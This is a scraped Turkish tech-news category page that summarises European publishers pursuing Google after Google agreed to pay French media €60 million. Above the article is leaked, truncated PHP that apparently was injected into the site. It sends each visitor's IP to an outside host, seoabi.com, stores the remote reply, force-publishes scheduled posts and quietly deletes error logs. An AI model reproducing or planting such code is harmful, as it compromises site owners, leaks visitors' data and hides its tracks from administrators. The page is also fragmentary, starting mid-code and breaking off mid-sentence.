$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> avrupa yayıncılar konseyi | Teknoloji Haberleri

avrupa yayıncılar konseyi kategorisindeki tüm yazılar

Son Yazılar

Yayıncılar Google’ın Peşine Düştü

Google’ın, Haberler hizmeti yüzünden Fransa’daki medya kuruluşlarına ödeme yapması Avrupa’daki yayıncıları harekete geçirdi. Ödemenin tüm Avrupa geneline yayılması gündeme geliyor. Google‘ın Fransa‘daki yayın kuruluşlarına Haberler (News) hizmeti yüzünden 60 milyon Euro ödeme yapmayı kabul etmesi Avrupa’daki diğer yayıncıları da harekete geçirdi. Thomson Reuters, Prisa, News International ve